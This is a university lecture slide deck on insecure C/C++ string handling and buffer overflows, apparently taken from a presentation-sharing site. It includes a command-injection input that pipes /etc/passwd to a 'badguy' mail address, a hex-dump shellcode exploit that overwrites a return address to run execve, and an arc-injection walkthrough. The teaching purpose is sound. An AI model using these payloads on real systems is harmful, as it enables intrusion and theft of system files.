1 / 71

Strings

Explore C and C++ string handling, learn about common errors like unbounded copying and truncation, and discover best practices for secure string manipulation.

windom
Download Presentation

Strings

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. Strings COEN 150 Spring 2007

  2. Strings • Strings are a fundamental concept, but they are not a built-in data type in C/C++. • C-Strings • C-style string: character array terminated by first null character. • Wide string: wide character array terminated by first null character. • C++ - Strings • Several Classes • Standard Template Class: • std::basic_string, std::string, std::wstring • No inter-operability between C and C++ style strings.

  3. h e l l o \0 length Strings • C-style strings consist of a contiguous sequence of characters terminated by and including the first null character. • A pointer to a string points to its initial character. • The length of a string is the number of bytes preceding the null character • The value of a string is the sequence of the values of the contained characters, in order.

  4. Strings • Common Errors: • Unbounded string copies • Null-termination errors • Truncation • Write outside array bounds • Off-by-one errors • Improper data sanitization

  5. Strings • What’s wrong? #include <iostream> void main(void) { char Password[80]; puts("Enter 8 character password:"); gets(Password); } • gets: The program reads from standard input until a newline character is read or an end of file (EOF) condition is encountered. • Programmer does not know the size of input. • Standard (vulnerable) solution allocates a much bigger buffer than expected input. • UNBOUNDED STRING COPY

  6. Strings • What’s wrong? #include <iostream> int main(int argc, char *argv[]) { char name [2048]; strcpy(name, argv[1]); strcat(name, " = "); strcat(name, argv[2]); return 0; }

  7. Strings • Same Problem: • The standard arguments can be of arbitrary length. • However, here we can get the length of the string before-hand: #include <string.h> #include <stdio.h> #include <stdlib.h> int main(int argc, char *argv[]) { char *buff = (char *)malloc(strlen(argv[1])+1); if (buff != NULL) { strcpy(buff, argv[1]); printf("argv[1] = %s.\n", buff); } else { /* Couldn't get the memory - recover */ } return 0; }

  8. Strings • C++ allows the same type of mistake. • Overflows buffer when input is longer than 11 characters. • cin extraction ends with a valid white space, a null character, or an EOF. • UNBOUNDED STRING COPY #include <iostream> using namespace std; int main() { char buf[12]; cin >> buf; cout<< "echo: " << buf << endl; return 0; }

  9. Strings • Correct Version: • Set the field width (ios_base::width) to a positive value. • cin.width(12) limits the extraction of characters so that at most 12 characters, including the terminating 0 character are read at a time. #include <iostream> using namespace std; int main() { char buf[12]; cin.width(12); cin >> buf; cout<< "echo: " << buf << endl; return 0; }

  10. Strings • What is wrong with this code? #include <string.h> #include <stdio.h> int main(int argc, char *argv[]) { 1 char a[16]; 2 char b[16]; 3 char c[32]; 5 strcpy(a, "0123456789abcdef"); 6 strcpy(b, "0123456789abcdef"); 7 strcpy(c, a); 8 strcat(c, b); 9 printf("a = %s\n", a); 10 return 0; } • Static allocation for character arrays a, b, c fails to allocate space for the null-termination character. • The strcpy (6) might overwrite this null byte. • This depends on how the compiler allocates memory. • If the byte is overwritten, then a points to an array of 32 bytes, and the strcat (7) writes beyond the bound of c. • Experience will vary depending on the compiler and debug / release version. • This errors can lay dormant for a long time until waken up by a simple program change. • NULL TERMINATION ERROR

  11. From ISO/IEC 9899:1999 The strncpy function char *strncpy(char * restrict s1, const char * restrict s2, size_t n); copies not more than n characters (characters that follow a null character are not copied) from the array pointed to by s2 to the array pointed to by s1.260) 260) Thus, if there is no null character in the first n characters of the array pointed to by s2, the result will not be null-terminated.

  12. Strings • String Truncation • Functions that restrict the number of bytes are often recommended to mitigate against buffer overflow vulnerabilities • strncpy() instead of strcpy() • fgets() instead of gets() • snprintf() instead of sprintf() • Strings that exceed the specified limits are truncated • Truncation results in a loss of data, and in some cases, to software vulnerabilities

  13. Strings: Off-by-One Errors Find all off-by-one errors 1. int main(int argc, char* argv[]) {  2.   char source[10];  3.   strcpy(source, "0123456789");  4.   char *dest = (char *)malloc(strlen(source));  5.   for (int i=1; i <= 11; i++) {  6.     dest[i] = source[i];  7.   }  8.   dest[i] = '\0';  9.   printf("dest = %s", dest); 10. } • source is 10 B long, but gets 10 characters. • Value returned by strlen does not take zero byte into account, hence, dest is too small. • for loop variable starts with 1, but string indices start with 0 • for loop stop condition is off. • Assignment (8) is out-of-bound write.

  14. Strings • String Errors without Functions • Since C-style strings are character arrays, it is possible to perform insecure string manipulations without explicitly calling any “dangerous” functions, such as strcpy(), strcat(), gets(), streadd(), strecpy(), … #include <stdio.h> int main(int argc, char *argv[]) { int i = 0; char buff[128]; char *arg1 = argv[1]; while (arg1[i] != '\0' ) { buff[i] = arg1[i]; i++; } buff[i] = '\0'; printf("buff = %s\n", buff); }

  15. Strings • Improper Data Sanitization • A much bigger problem, but here is a simple example: An application inputs an email address from a user and writes the address to a buffer [Viega 03] sprintf(buffer, "/bin/mail %s < /tmp/email", addr); The buffer is then executed using the system() call. The risk is, of course, that the user enters the following string as an email address: bogus@addr.com; cat /etc/passwd | mail some@badguy.net

  16. Strings String Vulnerabilities

  17. Commercial Message • Learn how to find cyber-crime • Find out what Law & Order does not show. • Learn about exploits. • TAKE COEN 252

  18. Source Memory Strings • A buffer overflow occurs when data is written outside of the boundaries of the memory allocated to a particular data structure. 11 Bytes of Data Copy Operation Other Memory Allocated Memory (8 Bytes)

  19. Strings • Buffer overflow occur because we usually do not check bounds. • Standard library functions do not check bounds. • Programmers do not check bounds. • Not all buffer overflows are exploitable.

  20. Strings • Process Memory Organization Code or Text: Instructions and read only data Data: Initialized data, uninitialized data, static variables, global variables Heap: Dynamically allocated variables Stack: Local variables, return addresses, etc.

  21. Strings: Stack Management • When calling a subroutine / function: • Stack stores the return address • Stack stores arguments, return values • Stack stores variables local to the subroutine • Information pushed on the stack for a subroutine call is called a frame. • Address of frame is stored in the frame or base point register. • epb on Intel architectures

  22. Strings: Stack Management #include <iostream> bool IsPasswordOkay(void) { char Password[8]; gets(Password); if (!strcmp(Password, “badprog")) return(true); else return(false); } void main() { bool PwStatus; puts("Enter password:"); PwStatus = IsPasswordOkay(); if (PwStatus == false){ puts("Access denied"); exit(-1); } else puts("Access granted"); }

  23. Strings: Stack Management Program stack before call to IsPasswordOkay() Stack puts("Enter Password:"); PwStatus=ISPasswordOkay(); if (PwStatus==true) puts("Hello, Master"); else puts("Access denied");

  24. Strings: Stack Management Program stack during call to IsPasswordOkay() Stack puts("Enter Password:"); PwStatus=ISPasswordOkay(); if (PwStatus ==true) puts("Hello, Master"); else puts("Access denied"); bool IsPasswordOkay(void) { char Password[8]; gets(Password); if (!strcmp(Password,"badprog")) return(true); elsereturn(false) }

  25. Strings: Stack Management Program stack after call to IsPasswordOkay() Stack puts("Enter Password:"); PwStatus=ISPasswordOkay(); if (PwStatus ==true) puts("Hello, Master"); else puts("Access denied");

  26. Strings: Buffer Overflow Example #include <iostream> bool IsPasswordOkay(void) { char Password[8]; gets(Password); if (!strcmp(Password, “badprog")) return(true); else return(false); } void main() { bool PwStatus; puts("Enter password:"); PwStatus = IsPasswordOkay(); if (PwStatus == false){ puts("Access denied"); exit(-1); } else puts("Access granted"); } • What happens if we enter more than 7 characters of an input string?

  27. StringsBuffer Overflow Example Stack bool IsPasswordOkay(void) { char Password[8]; gets(Password); if (!strcmp(Password,"badprog")) return(true); elsereturn(false) } The return address and other data on the stack is over written because the memory space allocated for the password can only hold a maximum 7 character plus the NULL terminator.

  28. A specially crafted string “abcdefghijklW►*!” produced the following result: Strings: Buffer Overflow Example

  29. The string “abcdefghijklW►*!” overwrote 9 extra bytes of memory on the stack changing the callers return address thus skipping the execution of line 3 Strings: Buffer Overflow Example Stack

  30. Exploitation of Buffer Overflows • A buffer overflow can be exploited by • Changing the return address in order to change the program flow (arc-injection) • Change the return address to point into the buffer where it contains some malicious code (Code injection)

  31. Exploitation of Buffer Overflows • The get password program can be exploited to execute arbitrary code by providing the following binary data file as input: 000 31 32 33 34 35 36 37 38-39 30 31 32 33 34 35 36 "1234567890123456" 010 37 38 39 30 31 32 33 34-35 36 37 38 E0 F9 FF BF "789012345678a· +" 020 31 C0 A3 FF F9 FF BF B0-0B BB 03 FA FF BF B9 FB "1+ú · +¦+· +¦v" 030 F9 FF BF 8B 15 FF F9 FF-BF CD 80 FF F9 FF BF 31 "· +ï§ · +-Ç · +1" 040 31 31 31 2F 75 73 72 2F-62 69 6E 2F 63 61 6C 0A "111/usr/bin/cal “ • This exploit is specific to Red Hat Linux 9.0 and GCC

  32. Exploitation of Buffer Overflows 000 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 "1234567890123456" 010 37 38 39 30 31 32 33 34 35 36 37 38 E0 F9 FF BF "789012345678a· +" 020 31 C0 A3 FF F9 FF BF B0 0B BB 03 FA FF BF B9 FB "1+ú · +¦+· +¦v" 030 F9 FF BF 8B 15 FF F9 FF BF CD 80 FF F9 FF BF 31 "· +ï§ · +-Ç · +1" 040 31 31 31 2F 75 73 72 2F 62 69 6E 2F 63 61 6C 0A "111/usr/bin/cal “ • The first 16 bytes of binary data fill the allocated storage space for the password. • NOTE: Even though the program only allocated 12 bytes for the password, the version of the gcc compiler used allocates stack data in multiples of 16 bytes

  33. Exploitation of Buffer Overflows 000 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 "1234567890123456" 010 37 38 39 30 31 32 33 34 35 36 37 38 E0 F9 FF BF "789012345678a· +" 020 31 C0 A3 FF F9 FF BF B0 0B BB 03 FA FF BF B9 FB "1+ú · +¦+· +¦v" 030 F9 FF BF 8B 15 FF F9 FF BF CD 80 FF F9 FF BF 31 "· +ï§ · +-Ç · +1" 040 31 31 31 2F 75 73 72 2F 62 69 6E 2F 63 61 6C 0A "111/usr/bin/cal “ • The next 12 bytes of binary data fill the extra storage space that was created by the compiler to keep the stack aligned on a16-byte boundary.

  34. Exploitation of Buffer Overflows 000 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 "1234567890123456" 010 37 38 39 30 31 32 33 34 35 36 37 38 E0 F9 FF BF "789012345678a· +" 020 31 C0 A3 FF F9 FF BF B0 0B BB 03 FA FF BF B9 FB "1+ú · +¦+· +¦v" 030 F9 FF BF 8B 15 FF F9 FF BF CD 80 FF F9 FF BF 31 "· +ï§ · +-Ç · +1" 040 31 31 31 2F 75 73 72 2F 62 69 6E 2F 63 61 6C 0A "111/usr/bin/cal “ • The next 12 bytes of binary data fill the extra storage space that was created by the compiler to keep the stack aligned on a16-byte boundary.

  35. Exploitation of Buffer Overflows 000 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 "1234567890123456" 010 37 38 39 30 31 32 33 34 35 36 37 38 E0 F9 FF BF "789012345678a· +" 020 31 C0 A3 FF F9 FF BF B0 0B BB 03 FA FF BF B9 FB "1+ú · +¦+· +¦v" 030 F9 FF BF 8B 15 FF F9 FF BF CD 80 FF F9 FF BF 31 "· +ï§ · +-Ç · +1" 040 31 31 31 2F 75 73 72 2F 62 69 6E 2F 63 61 6C 0A "111/usr/bin/cal “ • The next 4 bytes overwrite the return address. • The new return address is 0X BF FF F9 E0 (little-endian)

  36. Exploitation of Buffer Overflows

  37. Exploitation of Buffer Overflows 000 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 "1234567890123456" 010 37 38 39 30 31 32 33 34 35 36 37 38 E0 F9 FF BF "789012345678a· +" 020 31 C0 A3 FF F9 FF BF B0 0B BB 03 FA FF BF B9 FB "1+ú · +¦+· +¦v" 030 F9 FF BF 8B 15 FF F9 FF BF CD 80 FF F9 FF BF 31 "· +ï§ · +-Ç · +1" 040 31 31 31 2F 75 73 72 2F 62 69 6E 2F 63 61 6C 0A "111/usr/bin/cal “ • The malicious code. • Purpose of malicious code is to call execve with a user provided set of parameters. • In this program, instead of spawning a shell, we just call the linux calculator program.

  38. Exploitation of Buffer Overflows 000 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 "1234567890123456" 010 37 38 39 30 31 32 33 34 35 36 37 38 E0 F9 FF BF "789012345678a· +" 020 31 C0 A3 FF F9 FF BF B0 0B BB 03 FA FF BF B9 FB "1+ú · +¦+· +¦v" 030 F9 FF BF 8B 15 FF F9 FF BF CD 80 FF F9 FF BF 31 "· +ï§ · +-Ç · +1" 040 31 31 31 2F 75 73 72 2F 62 69 6E 2F 63 61 6C 0A "111/usr/bin/cal “ • The malicious code: • xor %eax,%eax #set eax to zero • mov %eax,0xbffff9ff #set to NULL word • Create a zero value and use it to NULL terminate the argument list. • This is necessary to terminate the argument list.

  39. Exploitation of Buffer Overflows 000 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 "1234567890123456" 010 37 38 39 30 31 32 33 34 35 36 37 38 E0 F9 FF BF "789012345678a· +" 020 31 C0 A3 FF F9 FF BF B0 0B BB 03 FA FF BF B9 FB "1+ú · +¦+· +¦v" 030 F9 FF BF 8B 15 FF F9 FF BF CD 80 FF F9 FF BF 31 "· +ï§ · +-Ç · +1" 040 31 31 31 2F 75 73 72 2F 62 69 6E 2F 63 61 6C 0A "111/usr/bin/cal “ • The malicious code: • xor %eax,%eax #set eax to zero • mov %eax,0xbffff9ff #set to NULL word • mov $0xb,%al #set code for execve • Set the value of register al to 0xb. This value indicates a system call to execve.

  40. Exploitation of Buffer Overflows 000 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 "1234567890123456" 010 37 38 39 30 31 32 33 34 35 36 37 38 E0 F9 FF BF "789012345678a· +" 020 31 C0 A3 FF F9 FF BF B0 0B BB 03 FA FF BF B9 FB "1+ú · +¦+· +¦v" 030 F9 FF BF 8B 15 FF F9 FF BF CD 80 FF F9 FF BF 31 "· +ï§ · +-Ç · +1" 040 31 31 31 2F 75 73 72 2F 62 69 6E 2F 63 61 6C 0A "111/usr/bin/cal “ • The malicious code: • mov $0xb,%al #set code for execve • mov $0xbffffa03,%ebx #ptr to arg 1 • mov $0xbffff9fb,%ecx #ptr to arg 2 • mov 0xbffff9ff,%edx #ptr to arg 3 • This puts the pointers to the arguments into ebc, ecx, and edx registers.

  41. Exploitation of Buffer Overflows 000 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 "1234567890123456" 010 37 38 39 30 31 32 33 34 35 36 37 38 E0 F9 FF BF "789012345678a· +" 020 31 C0 A3 FF F9 FF BF B0 0B BB 03 FA FF BF B9 FB "1+ú · +¦+· +¦v" 030 F9 FF BF 8B 15 FF F9 FF BF CD 80 FF F9 FF BF 31 "· +ï§ · +-Ç · +1" 040 31 31 31 2F 75 73 72 2F 62 69 6E 2F 63 61 6C 0A "111/usr/bin/cal “ • The malicious code: • mov $0xbffffa03,%ebx #ptr to arg 1 • mov $0xbffff9fb,%ecx #ptr to arg 2 • mov 0xbffff9ff,%edx #ptr to arg 3 • int $80 # make system call to execve • Now make the system call to execve. The arguments are in the registers.

  42. Exploitation of Buffer Overflows 000 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 "1234567890123456" 010 37 38 39 30 31 32 33 34 35 36 37 38 E0 F9 FF BF "789012345678a· +" 020 31 C0 A3 FF F9 FF BF B0 0B BB 03 FA FF BF B9 FB "1+ú · +¦+· +¦v" 030 F9 FF BF 8B 15 FF F9 FF BF CD 80 FF F9 FF BF 31 "· +ï§ · +-Ç · +1" 040 31 31 31 2F 75 73 72 2F 62 69 6E 2F 63 61 6C 0A "111/usr/bin/cal “ • The malicious code: • Last part are the arguments.

  43. Exploitation of Buffer Overflows • ./BufferOverflow < exploit.bin now executes /usr/bin/cal\0.

  44. Exploitation of Buffer Overflows Arc Injection

  45. Exploitation of Buffer Overflows #include <string.h> int get_buff(char *user_input) { char buff[4]; memcpy(buff, user_input, sizeof(user_input)); return 0; } int main(int argc, char *argv[]) { get_buff(argv[1]); return 0; }

  46. esp buff[4] ebp ebp (main) return addr(main) stack frame main Exploitation of Buffer Overflows esp buff[4] ebp ebp (frame 2) f() Frame 1 eip (leave/ret) f() argptr "f() arg data" ebp (frame 3) g() Return address has been replaced with address of f() Frame 2 eip (leave/ret) g() argptr "g() arg data" Orig frame ebp (orig) return addr(main) Stack before and after executing get_buff(argv[1]) with attacker provided string

  47. Exploitation of Buffer Overflows Frame pointer (now pointing to Frame 2) is moved into the stack pointer. mov esp, ebp pop ebp ret Control is returned to the address on the stack, which has been overwritten with the address of the arbitrary function f() Exploited function get_buf returns

  48. Exploitation of Buffer Overflows esp buff[4] ebp ebp (frame 2) f() Frame 1 eip (leave/ret) f() argptr "f() arg data" ebp (frame 3) When f() returns, it pops the stored eip off the stack and transfers control to this address. g() Frame 2 eip (leave/ret) g() argptr "g() arg data" Orig frame ebp (orig) return addr(main)

  49. esp buff[4] ebp ebp (frame 2) f() Frame 1 esp buff[4] eip (leave/ret) ebp ebp (main) f() argptr return addr(main) "f() arg data" stack frame main ebp (frame 3) g() Frame 2 eip (leave/ret) g() argptr "g() arg data" ebp (frame 4) h() Frame 3 eip (leave/ret) h() argptr "h() arg data" Orig frame ebp (orig) return addr(main) leave/ret mov esp, ebp pop ebp ret -or- leave ret

  50. Exploitation of Buffer Overflows • Result: • Control is returned to the address of an arbitrary function f(). • This function is provided with arguments installed on the stack. • Attacker could have added additional function calls or attacker could have returned to the main function for continuation of the program. • For example, attacker could first call setuid(), then call system()

More Related